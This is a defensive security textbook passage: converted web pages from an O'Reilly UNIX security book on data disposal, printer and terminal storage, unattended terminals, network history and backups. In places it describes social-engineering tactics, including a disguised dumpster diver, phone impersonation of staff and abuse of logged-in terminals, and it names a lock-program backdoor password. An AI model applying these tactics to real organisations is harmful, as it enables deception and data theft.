contains chips that automatically encrypt all data as it is written. We discuss the issue of encrypting your<br />

backups, in more detail, in Chapter 7.<br />

NOTE: If you encrypt the backup of a filesystem and you forget the encryption key, the<br />

information stored on the backup will be unusable. This is why escrowing your own keys is<br />

important. (See the sidebar "A Note About Key Escrow".)<br />

12.3.3 Other Media<br />

In the last section, we discussed the importance of erasing magnetic media before disposing of it.<br />

However, that media is not the only material that should be carefully "sanitized" before disposal. Other<br />

material that may find its way into the trash may contain information that is useful to crackers or<br />

competitors. This includes printouts of software (including incomplete versions), memos, design<br />

documents, preliminary code, planning documents, internal newsletters, company phonebooks, manuals,<br />

and other material.<br />

That some program printouts might be used against you is obvious, especially if enough are collected<br />

over time to derive a complete picture of your software development. If the code is commented well<br />

enough, it may also give away clues as to the identity of beta testers and customers, testing strategies,<br />

and marketing plans!<br />

Other material may be used to derive information about company personnel and operations. With a<br />

company phone book, one could masquerade as an employee over the telephone and obtain sensitive<br />

information including dial-up numbers, account names, and passwords. Sound farfetched? Think again -<br />

there are numerous stories of such social engineering. The more internal information an outsider has, the<br />

more easily he can obtain sensitive information. By knowing the names, office numbers, and extensions<br />

of company officials and their staff, he can easily convince an overworked and undertrained operator that<br />

he needs to violate the written policy - or incur the wrath of the "vice president" - on the phone.<br />

Other information that may find its way into your dumpster includes information on the types and<br />

versions of your operating systems and computers, serial numbers, patch levels, and other information. It<br />

may include hostnames, IP numbers, account names, and other information critical to an attacker. We<br />

have heard of some firms disposing of listings of their complete firewall configuration and filter rules - a<br />

gold mine for someone seeking to infiltrate the computers.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_03.htm (5 of 9) [2002-04-12 10:44:06]


[Chapter 12] 12.3 Protecting Data<br />

How will this information find its way into the wrong hands? Well, " dumpster diving" or " trashing" is<br />

one such way. After hours, someone intent on breaking your security could be rummaging through your<br />

dumpster, looking for useful information. In one case we heard recounted, a "diver" dressed up as a street<br />

person (letting his beard grow a bit and not bathing for a few days), splashed a little cheap booze on<br />

himself, half-filled a mesh bag with empty soda cans, and went to work. As he went from dumpster to<br />

dumpster in an industrial office park, he was effectively invisible: busy and well-paid executives seem to<br />

see through the homeless and unfortunate. If someone began to approach him, he would pluck invisible<br />

bugs from his shirt and talk loudly to himself. In the one case where he was accosted by a security guard,<br />

he was able to the convince the guard to let him continue looking for "cans" for spare change. He even<br />

panhandled the guard to give him $5 for a meal!<br />

Perhaps you have your dumpster inside a guarded fence. But what happens after it is picked up by the<br />

trash hauler? Is it dumped where someone can go though the information off your premises?<br />

Consider carefully the value of the information you throw away. Consider investing in shredders for each<br />

location where information of value might be thrown away. Educate your users not to dispose of<br />

sensitive material in their refuse at home, but to bring it in to be shredded. If your organization is large<br />

enough and local ordinances allow, you may also wish to incinerate some sensitive paper waste on-site.<br />

12.3.4 Protecting Local Storage<br />

In addition to computers and mass-storage systems, many other pieces of electrical data-processing<br />

equipment store information. For example, terminals, modems and laser printers often contain pieces of<br />

memory that may be downloaded and uploaded with appropriate control sequences.<br />

Naturally, any piece of memory that is used to hold sensitive information presents a security problem,<br />

especially if that piece of memory is not protected with a password, encryption, or other similar<br />

mechanism. However, the local storage in many devices presents an additional security problem, because<br />

sensitive information is frequently copied into such local storage without the knowledge of the computer<br />

user.<br />

12.3.4.1 Printer buffers<br />

Computers can transmit information many times faster than most printers can print it. For this reason,<br />

printers are sometimes equipped with "printer spoolers" - boxes with semiconductor memory that receive<br />

information quickly from the computer and transmit it to the printer at a slower rate.<br />

Many printer spoolers have the ability to make multiple copies of a document. Sometimes, this function<br />

is accomplished with a COPY button on the front of the printer spooler. Whenever the COPY button is<br />

pressed, a copy of everything that has been printed is sent to the printer for a second time. The security<br />

risk is obvious: if sensitive information is still in the printer's buffer, an attacker can use the COPY<br />

button to make a copy for himself.<br />

Today, many high-speed laser printers are programmable and contain significant amounts of local<br />

storage. (Some laser printers have internal hard disks that can be used to store hundreds of megabytes of<br />

information.) Some of these printers can be programmed to store a copy of any document printed for<br />

later use. Other printers use the local storage as a buffer; unless the buffer is appropriately sanitized after<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_03.htm (6 of 9) [2002-04-12 10:44:06]


[Chapter 12] 12.3 Protecting Data<br />

printing, an attacker with sufficient skill can retrieve some or all of the contained data.<br />

12.3.4.2 Printer output<br />

One form of local storage you may not think of is the output of your workgroup printer. If the printer is<br />

located in a semi-public location, the output may be vulnerable to theft or copying before it is claimed.<br />

You should ensure that printers, plotters, and other output devices are located in a secured location. Fax<br />

machines face similar vulnerabilities.<br />

12.3.4.3 Multiple screens<br />

Today many "smart" terminals are equipped with multiple screens of memory. By pressing a PAGE-UP<br />

key (or a key that is similarly labeled), you can view information that has scrolled off the terminal's top<br />

line.<br />

When a user logs out, the memory used to hold information that is scrolled off the screen is not<br />

necessarily cleared - even if the main screen is. Therefore, we recommend that you be sure, when you log<br />

out of a computer, that all of your terminal's screen memory is erased. You might have to send a control<br />

sequence or even turn off the terminal to erase its memory.<br />

12.3.4.4 X terminals<br />

Many X terminals have substantial amounts of local storage. Some X terminals even have hard disks that<br />

can be accessed from over the network.<br />

Here are some guidelines for using X terminals securely:<br />

●<br />

●<br />

If your users work with sensitive information, they should turn off their X terminals at the end of<br />

the day to clear the terminals' RAM memory.<br />

If your X terminals have hard disks, you should be sure that the terminals are password protected<br />

so that they cannot be easily reprogrammed over the network. Do not allow service personnel to<br />

remove the X terminals for repair unless the disks are first removed and erased.<br />

12.3.4.5 Function keys<br />

Many smart terminals are equipped with function keys that can be programmed to send an arbitrary<br />

sequence of keystrokes to the computer whenever a function key is pressed. If a function key is used to<br />

store a password, then any person who has physical access to the terminal can impersonate the terminal's<br />

primary user. If a terminal is stolen, then the passwords are compromised. Therefore, we recommend that<br />

you never use function keys to store passwords or other kinds of sensitive information (such as<br />

cryptographic keys).<br />

12.3.5 Unattended Terminals<br />

Unattended terminals where users have left themselves logged in present a special attraction for vandals<br />

(as well as for computer crackers). A vandal can access the person's files with impunity. Alternatively,<br />

the vandal can use the person's account as a starting point for launching an attack against the computer<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_03.htm (7 of 9) [2002-04-12 10:44:06]


[Chapter 12] 12.3 Protecting Data<br />

system or the entire network: any tracing of the attack will usually point fingers back toward the<br />

account's owner, not to the vandal.<br />

In particular, not only will this scenario allow someone to create a SUID shell of the user involved, and<br />

thus gain longer-term access to the account, but an untrained attacker could commit some email mayhem.<br />

Imagine someone sending email, as you, to the CEO or the Dean, making some lunatic and obscene<br />

suggestions? Or perhaps email to whitehouse.gov with a threat against the President?[7] Hence, you<br />

should never leave terminals unattended for more than short periods of time.<br />

[7] Don't even think about doing this yourself! The <strong>Sec</strong>ret Service investigates each and<br />

every threat against the President, the President's family, and certain other officials. They<br />

take such threats very seriously, and they are not known for their senses of humor. They are<br />

also very skilled at tracing down the real culprit in such incidents - we know from observing<br />

their work on a number of occasions. These threats simply aren't funny - especially if you<br />

end up facing Federal criminal charges as a result.<br />

Some versions of <strong>UNIX</strong> have the ability to log a user off automatically - or at least to blank his screen<br />

and lock his keyboard - when the user's terminal has been idle for more than a few minutes.<br />

12.3.5.1 Built-in shell autologout<br />

If you use the C shell, you can use the autologout shell variable to log you out automatically after you<br />

have been idle for a specified number of minutes.[8] Normally, this variable is set in your ~/.cshrc file.<br />

[8] The autologout variable is not available under all versions of the C shell.<br />

For example, if you wish to be logged out automatically after you have been idle for 10 minutes, place<br />

this line in your ~/.cshrc file:<br />

set autologout=10<br />

Note that the C shell will log you out only if you idle at the C shell's command prompt. If you are idle<br />

within an application, such as a word processor, you will remain logged in.<br />

The ksh has a TMOUT variable that performs a similar function. TMOUT is specified in seconds:<br />

TMOUT=600<br />

12.3.5.2 X screen savers<br />

If you use the X Window System, you may wish to use a screen saver that automatically locks your<br />

workstation after the keyboard and mouse have been inactive for more than a predetermined number of<br />

minutes.<br />

There are many screen savers to chose from. XScreensaver was originally written by the Student<br />

Information Processing Board at MIT. New versions are periodically posted to the Usenet newsgroup<br />

comp.sources.x and are archived on the computer ftp.uu.net. Another screen saver is xautolock. In<br />

addition, HP VUE and the COSE Desktop comes with an automatic screen locker. AIX includes a utility<br />

called xss that automatically locks X screens.<br />

NOTE: Many vendor-supplied screen savers respond to built-in passwords in addition to<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_03.htm (8 of 9) [2002-04-12 10:44:06]


[Chapter 12] 12.3 Protecting Data<br />

the user's passwords. The <strong>UNIX</strong> lock program, for example, previously unlocked the user's<br />

terminal if somebody typed hasta la vista - and this fact was undocumented in the manual.<br />

Unless you have the source code for a program, there is no way to determine whether it has<br />

a back door of any kind, although you can find simple-minded ones by scanning the<br />

program with the strings command. You would be better off using a vendor-supplied<br />

locking tool rather than leaving your terminal unattended, and unlocked, while you go for<br />

coffee. But be attentive, and beware.<br />

12.3.6 Key Switches<br />

Some kinds of computers have key switches on their front panels that can be used to prevent the system<br />

from being rebooted in single-user mode. Some computers also have ROM monitors that prevent the<br />

system from being rebooted in single-user mode without a password.<br />

Key switches and ROM monitor passwords provide additional security and should be used when<br />

possible. However, you should also remember that any computer can be unplugged. The most important<br />

way to protect a computer is to restrict physical access to that computer.<br />

12.2 Protecting Computer<br />

Hardware<br />

12.4 Story: A Failed Site<br />

Inspection<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_03.htm (9 of 9) [2002-04-12 10:44:06]


[Chapter 16] TCP/IP Networks<br />

Chapter 16<br />

16. TCP/IP Networks<br />

Contents:<br />

Networking<br />

IPv4: The <strong>Internet</strong> Protocol Version 4<br />

IP <strong>Sec</strong>urity<br />

Other Network Protocols<br />

Summary<br />

Local and wide area computer networks have changed the landscape of computing forever. Almost gone<br />

are the days when each computer was separate and distinct. Today, networks allow people across a room<br />

or across the globe to exchange electronic messages, share resources such as printers and disk drives, or<br />

even use each other's computers. Networks have become such an indispensable part of so many people's<br />

lives that one can hardly imagine using modern computers without them.<br />

But networks have also brought with them their share of security problems, precisely because of their<br />

power to let users easily share information and resources. Networks allow people you have never met to<br />

reach out and touch you - and erase all of your files in the process. They have enabled individuals to<br />

launch sophisticated electronic attacks against major institutions as well as desktop computers in home<br />

offices. Indeed, networks have created almost as many risks as they have created opportunities.<br />

The next six chapters of this book discuss <strong>UNIX</strong> security issues arising from the deployment of computer<br />

networks. In this chapter we describe local and wide area networks, and show how they fit into the <strong>UNIX</strong><br />

security picture.<br />

16.1 Networking<br />

From a practical viewpoint, computer users today usually divide the world of networking into two<br />

halves:<br />

●<br />

●<br />

Local Area Networks (LANS) are high-speed networks used to connect together computers at a<br />

single location. Popular LANS include Ethernet (see Figure 16.1), token ring, and 10Base-T (also<br />

known as twisted-pair; see Figure 16.2). LANS typically run at 10 megabits/sec or faster. LANS<br />

capable of 100 megabits/sec are expected to be widely available in the coming years.<br />

Wide Area Networks (WANS) are slower-speed networks that organizations typically use to<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_01.htm (1 of 4) [2002-04-12 10:44:06]


[Chapter 16] TCP/IP Networks<br />

connect their LANS. WANS are often built from leased telephone lines capable of moving data at<br />

speeds of 56 kilobits/sec to 1.55 megabits/sec. A WAN might bridge a company's offices on either<br />

side of the town or on either side of a continent. Some WANS are shared by several organizations.<br />

Figure 16.1: Ethernet local area network<br />

Figure 16.2: 10Base-T local area network<br />

Some authors also use the terms Enterprise Networks and Metropolitan Networks (MANS). In general,<br />

these are simply combinations of LANS and WANS which serve a logically related group of systems.<br />

Many businesses started using LANS in the late 1980s and expanded into the world of WANS in the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_01.htm (2 of 4) [2002-04-12 10:44:06]


[Chapter 16] TCP/IP Networks<br />

early 1990s. Nevertheless, the technology to network computers was actually developed in the reverse<br />

order: WANS were first developed in the early 1970s to network timesharing computers that were used<br />

by many people at the same time. Later, in the early 1980s, LANS were developed, after computers<br />

became economical and single-user computers became a financial reality.<br />

16.1.1 The <strong>Internet</strong>[1]<br />

[1] We recommend that readers interested in the history of networks read the excellent<br />

Casting the Net: From ARPANET to INTERNET and Beyond, by Peter H. Salus<br />

(Addison-Wesley, 1995).<br />

One of the first computer networks was the ARPANET, developed in the early 1970s by universities and<br />

corporations working under contract to the Department of Defense's Advanced Research Projects Agency<br />

(ARPA, once also known as DARPA). The ARPANET linked computers around the world, and served<br />

as a backbone for many other regional and campus-wide networks that sprang up in the 1980s. In the late<br />

1980s, the ARPANET was superseded by the NSFNET, funded in part by the National Science<br />

Foundation. Funding for the NSFNET was cut in the early 1990s as commercial networks grew in<br />

number and scope.<br />

Today, the descendent of the ARPANET is known as the <strong>Internet</strong>. The <strong>Internet</strong> is an IP-based[2] network<br />

that encompasses hundreds of thousands of computers and tens of millions of users throughout the world.<br />

Similar to the phone system, the <strong>Internet</strong> is well connected. Any one of those tens of millions of users<br />

can send you electronic mail, exchange files with your FTP file server, or try his hand at breaking into<br />

your system - if your system is configured to allow them the access necessary to do so.<br />

[2] IP stands for <strong>Internet</strong> Protocol, the basic protocol family for packet interchange.<br />

16.1.1.1 Who is on the <strong>Internet</strong>?<br />

In the early days of the ARPANET, the network was primarily used by a small group of research<br />

scientists, students, and administrative personnel. <strong>Sec</strong>urity problems were rare: if somebody on the<br />

network was disruptive, tracking him down and having him disciplined was a simple matter. In extreme<br />

cases, people could lose their network privileges, or even their jobs (which produced the same result). In<br />

many ways, the <strong>Internet</strong> was a large, private club.<br />

These days the <strong>Internet</strong> is not so exclusive. The <strong>Internet</strong> has grown so large that you can almost never<br />

determine the identity of somebody who is breaking into your system: attackers may appear to be coming<br />

from a university in upstate New York, but the real story can be quite different. Attackers based in the<br />

Netherlands could have broken into a system in Australia, connected through the Australian system to a<br />

system in South Africa, and finally connected through the South African system to a New York<br />

university. The attackers could then use the New York account as a base of operations to launch attacks<br />

against other sites, with little chance of being traced back to their own site. This site hopping is known as<br />

network weaving or connection laundering.<br />

Even if you are persistent and discover the true identity of your attacker, you may have no course of<br />

action: the attacks may be coming from a country that does not recognize breaking into computers as a<br />

crime. Or, the attacks may be coming from an agent of a foreign government, as part of a plan to develop<br />

so-called "information warfare" capabilities.[3] There is also a suspected component of activity by<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_01.htm (3 of 4) [2002-04-12 10:44:06]


[Chapter 16] TCP/IP Networks<br />

organized crime, and by some multinational corporations. In each of these cases, there may be<br />

considerable resources arrayed against any attempt to identify and prosecute the perpetrators.<br />

[3] Some authorities speculate (in private) that as many as a third of break-ins to major<br />

corporate and government computers in the U.S. may be the result of "probe" attempts by<br />

foreign agents, at least indirectly.<br />

16.1.2 Networking and <strong>UNIX</strong><br />

<strong>UNIX</strong> has both benefited from and contributed to the popularity of networking. Berkeley's 4.2 release in<br />

1983 provided a straightforward and reasonably reliable implementation of the <strong>Internet</strong> Protocol (IP), the<br />

data communications standard that the <strong>Internet</strong> uses. Since then, the Berkeley networking code has been<br />

adopted by most <strong>UNIX</strong> vendors, as well as by vendors of many non-<strong>UNIX</strong> systems.<br />

After more than a decade of development, the <strong>UNIX</strong> operating system has evolved to such a point that<br />

nearly all of the things that you can do on a single time-shared computer can be done as least as well as<br />

on a network of <strong>UNIX</strong> workstations. Here is a sample list:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Remote virtual terminals (telnet and rlogin). Lets you log into another computer on the network.<br />

Remote file service. Lets you access your files on one computer while you are using another.<br />

Electronic mail (mail and sendmail). Lets you send a message to a user or users on another<br />

computer.<br />

Electronic directory service (finger, whois, and ph). Lets you find out the username, telephone<br />

number, and other information about somebody on another computer.<br />

Date and time. Lets your computer automatically synchronize its clock with other computers on<br />

the network.<br />

Remote Procedure Call (RPC). Lets you invoke subroutines and programs on remote systems as if<br />

they were on your local machine.<br />

15.9 Summary 16.2 IPv4: The <strong>Internet</strong><br />

Protocol Version 4<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_01.htm (4 of 4) [2002-04-12 10:44:06]


[Chapter 7] Backups<br />

7. Backups<br />

Contents:<br />

Make Backups!<br />

Sample Backup Strategies<br />

Backing Up System Files<br />

Software for Backups<br />

Chapter 7<br />

Those who forget the past are condemned to fulfill it.<br />

George Santayana, Life of Reason<br />

Those who do not archive the past are condemned to retype it!<br />

Garfinkel and Spafford, <strong>Practical</strong> <strong>UNIX</strong> <strong>Sec</strong>urity (first edition)<br />

When we were working on the first edition of <strong>Practical</strong> <strong>UNIX</strong> <strong>Sec</strong>urity, we tried in vain to locate a<br />

source of the quotation "those who forget the past are condemned to repeat it." But no matter where we<br />

searched, we couldn't find the source. What we found instead was the reference above in George<br />

Santayana's book, Life of Reason. So we printed it and added our own variation.<br />

What's the point? Few people take the time to verify their facts, be they the words of Santayana's<br />

oft-misquoted statement, or the contents of an unlabeled backup tape. In the years since <strong>Practical</strong> <strong>UNIX</strong><br />

<strong>Sec</strong>urity was first published, we have heard of countless instances in which people or whole<br />

organizations have had their files lost to computer failure or vandalism. Often, the victims are unable to<br />

restore their systems from full and compete backups. Instead, restoration is often a piecemeal and lengthy<br />

project - a few files from this tape, a few files from that one, and a few from the original CD-ROM<br />

distribution.<br />

Even if backup tapes exist, there are still problems. In one case, a researcher at Digital Equipment<br />

Corporation lost a decade's worth of personal email because of a bad block at the beginning of a 2GB<br />

DAT tape. The contents of the tape had never been verified.<br />

In another case, we know of a project group that had to manually recreate a system from printouts (that<br />

is, they had to retype the entire system) because the locally written backup program was faulty. Although<br />

the staff had tested the program, they had only tested the program with small, random files - and the<br />

program's bug was that it only backed up the first 1024 bytes of each real file. Unfortunately, this fault<br />

was not discovered until after the program had been in use several months.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_01.htm (1 of 12) [2002-04-12 10:44:07]


[Chapter 7] Backups<br />

Making backups and verifying them may be the most important things that you can do to protect your<br />

data - other than reading this book, of course!<br />

7.1 Make Backups!<br />

Bugs, accidents, natural disasters, and attacks on your system cannot be predicted. Often, despite your<br />

best efforts, they can't be prevented. But if you have backups, you can compare your current system and<br />

your backed-up system, and you can restore your system to a stable state. Even if you lose your entire<br />

computer - to fire, for instance - with a good set of backups you can restore the information after you<br />

have purchased or borrowed a replacement machine. Insurance can cover the cost of a new CPU and disk<br />

drive, but your data is something that in many cases can never be replaced.<br />

Take the Test<br />

Before we go on with this chapter, take some time for the following quick test:<br />

When was the last time your computer was backed up?<br />

A) Yesterday or today<br />

B) Within the last week<br />

C) Within the last month<br />

D) My computer has never been backed up<br />

E) My computer is against a wall and cannot be backed up any further<br />

If you answered C or D, stop reading this book right now and back up your data. If you answered E, you<br />

should move it out from the wall to allow for proper cooling ventilation, and then retake the test.<br />

Russell Brand writes:[1] "To me, the user data is of paramount importance. Anything else is generally<br />

replaceable. You can buy more disk drives, more computers, more electrical power. If you lose the data,<br />

through a security incident or otherwise, it is gone."<br />

[1] Coping with the Threat of Computer <strong>Sec</strong>urity Incidents, 1990, published on the <strong>Internet</strong>.<br />

Mr. Brand made this comment in a paper on <strong>UNIX</strong> security several years ago; we think it summarizes<br />

the situation well, within limits.[2] Backups are one of the most critical aspects of your system operation.<br />

Having backups that are valid, complete, and up to date may make the difference between a minor<br />

incident and a catastrophe.<br />

[2] We actually think personnel are more important than data. We've seen disaster response<br />

plans that call for staff members to dash into burning rooms to close tape closets or rescue<br />

tapes; these are stupid. Plans that require such activity are not likely to work when needed,<br />

and are morally indefensible.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_01.htm (2 of 12) [2002-04-12 10:44:07]


[Chapter 7] Backups<br />

7.1.1 Why Make Backups?<br />

Backups are important only if you value the work that you do on your computer. If you use your<br />

computer as a paperweight, then you don't need to make backups.<br />

You also don't need to back up a computer that only uses read-only storage, such as a CD-ROM. A<br />

variant of this is Sun's "dataless" client workstations, in which the operating system is installed from a<br />

CD-ROMand never modified. When configured this way, the computer's local hard disk is used as an<br />

accelerator and a cache, but it is not used to store data you would want to archive. Sun specifically<br />

designs its operating system for these machines so that they do not need backups.<br />

On the other hand, if you ever turn your computer on and occasionally modify data on it, then you must<br />

make a copy of that information if you want to recover it in the event of a loss.<br />

7.1.1.1 A taxonomy of computer failures<br />

Years ago, making daily backups was a common practice because computer hardware would often fail<br />

for no obvious reason. A backup was the only protection against data loss.<br />

Today, hardware failure is still a good reason to back up your system. In 1990, many hard-disk<br />

companies gave their drives two- or three-year guarantees; many of those drives are failing now. Even<br />

though today's state-of-the-art hard disk drives might come with five-year warranties, they too will fail<br />

one day!<br />

Such a failure might not be years away, either. In the fall of 1993, one of the authors bought a new<br />

1.7GB hard drive to replace a 1.0 GB unit. The files were copied from the older drive to the newer one,<br />

and then the older unit was reformatted and given to a colleague. The next week, the 1.7GB unit failed.<br />

Luckily, there was a backup.<br />

Backups are important for a number of other reasons as well:<br />

User error<br />

Users - especially novice users - accidentally delete their files. A user might type rm * -i instead of<br />

typing rm -i *. Making periodic backups protects users from their own mistakes, because the<br />

deleted files can be restored. Mistakes aren't limited to novices, either. More than one expert has<br />

accidentally overwritten a file by issuing an incorrect editor or compiler command, or accidentally<br />

trashed an entire directory by mistyping a wildcard to the shell.<br />

System-staff error<br />

Sometimes your system staff may make a mistake. For example, a system administrator deleting<br />

old accounts might accidentally delete an active one.<br />

Hardware failure<br />

Hardware breaks, often destroying data in the process: disk crashes are not unheard of. If you have<br />

a backup, you can restore the data on a different computer system.<br />

Software failure<br />

Application programs occasionally have hidden flaws that destroy data under mysterious<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_01.htm (3 of 12) [2002-04-12 10:44:07]


[Chapter 7] Backups<br />

circumstances.[3] If you have a backup and your application program suddenly deletes half of your<br />

500 x 500-cell spreadsheet, you can telephone the vendor and provide them with the dataset that<br />

caused the program to misbehave. You can also reload your data to try a different approach (and a<br />

different spreadsheet!).<br />

[3] Unfortunately, more than "occasionally." Quality control is not job #1 for most<br />

vendors - even the big ones. It's probably not even job # 10. This fact is why most<br />

software is sold with the tiny print disclaimers of liability and waiver of warranty.<br />

When your vendors don't have that much confidence in their own software, you<br />

shouldn't either. Caveat emptor.<br />

Electronic break-ins and vandalism<br />

Theft<br />

Computer crackers sometimes alter or delete data. Unfortunately, they seldom leave messages<br />

telling you whether they changed any information - and even if they do, you can't trust them! If<br />

you suffer a break-in, you can compare the data on your computer after the break-in with the data<br />

on your backup to determine if anything was changed. Items that have changed can be replaced<br />

with originals.<br />

Computers are expensive and easy to sell. For this reason, small computers - especially laptops -<br />

are often stolen. Cash from your insurance company can buy you a new computer, but it can't<br />

bring back your data. Not only should you make a backup, you should take it out of your computer<br />

and store it in a safe place, so that if the computer is stolen, at least you'll have your data.<br />

Natural disaster<br />

Sometimes rain falls and buildings are washed away. Sometimes the earth shakes and buildings are<br />

demolished. Fires are also very effective at destroying the places where we keep our computers.<br />

Mother Nature is inventive and not always kind. As with theft, your insurance company can buy<br />

you a new computer, but it can't bring back your data.<br />

Other disasters<br />

Sometimes Mother Nature isn't to blame: planes crash into buildings; gas pipes leak and cause<br />

explosions; and sometimes building-maintenance people use disk-drive cabinets as temporary saw<br />

horses (really!). We even know of one instance in which EPA inspectors came into a building and<br />

found asbestos in the A/C ducts, so they forced everyone to leave within 10 minutes, and then<br />

sealed the building for several months!<br />

Archival information<br />

Backups provide archival information that lets you compare current versions of software and<br />

databases with older ones. This capability lets you determine what you've changed - intentionally<br />

or by accident. It also provides an invaluable resource if you ever need to go back and reconstruct<br />

the history of a project, either as an academic exercise, or to provide evidence in a court case.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_01.htm (4 of 12) [2002-04-12 10:44:07]


[Chapter 7] Backups<br />

7.1.2 What Should You Back Up?<br />

There are two schools of thought concerning computer-backup systems:<br />

1.<br />

2.<br />

Back up everything that is unique to your system, including all user files, any system databases<br />

that you might have modified (such as /etc/passwd and /etc/tty), and important system directories<br />

(such as /bin and /usr/bin) that are especially important or that you may have modified.<br />

Back up everything, because restoring a complete system is easier than restoring an incomplete<br />

one, and tape is cheap.<br />

We recommend the second school of thought. While some of the information you back up is already<br />

"backed up" on the original distribution disks or tape you used to load them onto your hard disk,<br />

distribution disks or tapes sometimes get lost. Furthermore, as your system ages, programs get installed<br />

in reserved directories such as /bin and /usr/bin, security holes get discovered and patched, and other<br />

changes occur. If you've ever tried to restore your system after a disaster,[4] you know how much easier<br />

the process is when everything is in the same place.<br />

[4] Imagine having to reapply 75 vendor "jumbo patches" by hand, plus all the little security<br />

patches you got off the net and derived from this book, plus all the tweaks to optimize<br />

performance - for each system you manage. Ouch!<br />

For this reason, we recommend that you store everything from your system (and that means everything<br />

necessary to reinstall the system from scratch - every last file) onto backup media at regular, predefined<br />

intervals. How often you do this depends on the speed of your backup equipment and the amount of<br />

storage space allocated for backups. You might want to do a total backup once a week, or you might<br />

want to do it only twice a year.<br />

But please do it!<br />

7.1.3 Types of Backups<br />

There are three basic types of backups:<br />

●<br />

●<br />

A day-zero backup<br />

Makes a copy of your original system. When your system is first installed, before people have<br />

started to use it, back up every file and program on the system. Such backups can be invaluable<br />

after a break-in.[5]<br />

[5] We recommend that you also do such a backup immediately after you restore your<br />

system after recovering from a break-in. Even if you have left a hole open and the<br />

intruder returns, you'll save a lot of time if you are able to fix the hole in the backup,<br />

rather than starting from scratch again.<br />

A full backup<br />

Makes a copy of every file on your computer to the backup device. This method is similar to a<br />

day-zero backup, except that you do it on a regular basis.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_01.htm (5 of 12) [2002-04-12 10:44:07]


[Chapter 7] Backups<br />

●<br />

An incremental backup<br />

Makes a copy to the backup device of only those items in a filesystem that have been modified<br />

after a particular event (such as application of a vendor patch) or date (such as the date of the last<br />

full backup).<br />

Full backups and incremental backups work together. One common backup strategy is:<br />

●<br />

●<br />

Make a full backup on the first day of every other week.<br />

Make an incremental backup every evening of everything that has been modified since the last full<br />

backup.<br />

Most <strong>UNIX</strong> administrators plan and store their backups by partition. Different partitions usually require<br />

different backup strategies. Some partitions, like the root filesystem and the /etc filesystem (if it is<br />

separate), should probably be backed up whenever you make a change to them, on the theory that every<br />

change that you make to them is too important to lose. You should use full backups with these systems,<br />

rather than incremental backups, because they are only usable in their entirety.<br />

On the other hand, partitions that are used for keeping user files are more amenable to incremental<br />

backups. Partitions that are used solely for storing application programs really only need to be backed up<br />

when new programs are installed or when the configuration of existing programs are changed.<br />

When you make incremental backups, use a rotating set of backup tapes.[6] The backup you do tonight<br />

shouldn't write over the tape you used for your backup last night. Otherwise, if your computer crashes in<br />

the middle of tonight's backup, you would lose the data on the disk, the data in tonight's backup (because<br />

it is incomplete), and the data in last night's backup (because you partially overwrote it with tonight's<br />

backup). Ideally, perform an incremental backup once a night, and have a different tape for every night<br />

of the week, as shown in<br />

[6] Yes, all tapes rotate. We mean that the tapes are rotated with each other according to a<br />

schedule, rather than being rotated around a spindle.<br />

Figure 7.1: An incremental backup<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_01.htm (6 of 12) [2002-04-12 10:44:07]


[Chapter 7] Backups<br />

Update Your Backup Configuration!<br />

When you add new disks or change the partitions of your existing disks, be sure to update your backup<br />

scripts so that the new disks are backed up! If you are using the <strong>UNIX</strong> dump/restore facility, be sure to<br />

update the /etc/dumpdates file so that the dump program will not think that full backups have already<br />

been made of the new partitions.<br />

7.1.4 Guarding Against Media Failure<br />

You can use two distinct sets of backup tapes to create a tandem backup. With this backup strategy, you<br />

create two complete backups (call them A and B) on successive backup occasions. Then, when you<br />

perform your first incremental backup, the A incremental, you back up all of the files that were created or<br />

modified after the original A backup (even if they are on the B full backup tape). The second time you<br />

perform an incremental backup, your B incremental, you write out all of the files that were created or<br />

modified since the B backup (even if they are on the A incremental backup.) This system protects you<br />

against media failure, because every file is backed up in two locations. It does, however, double the<br />

amount of time that you will spend performing backups.<br />

Some kinds of tapes - in particular, 4mm or 8mm video tape and Digital Audio Tape (DAT) - cannot be<br />

reused repeatedly without degrading the quality of the backup. If you use the same tape cartridge for<br />

more than a fixed number of backups (usually, 50 or 100), you should get a new one. Be certain to see<br />

what the vendor recommends - and don't push that limit. The few pennies you may save by using a tape<br />

beyond its useful range will not offset the cost of a major loss.<br />

Try to restore a few files chosen at random from your backups each time, to make sure that your<br />

equipment and software are functioning properly. Stories abound about computer centers that have lost<br />

disk drives and gone to their backup tapes, only to find them all unreadable. This scenario can occur as a<br />

result of bad tapes, improper backup procedures, faulty software, operator error (see the sidebar below),<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_01.htm (7 of 12) [2002-04-12 10:44:08]


[Chapter 7] Backups<br />

or other problems.<br />

A Classic Case of Backup Horror<br />

Sometimes, the weakest link in the backup chain is the human responsible for making the backup. Even<br />

when everything is automated and requires little thought, things can go badly awry. The following was<br />

presented to one of us as a true story. The names and agency have been omitted for obvious reasons.<br />

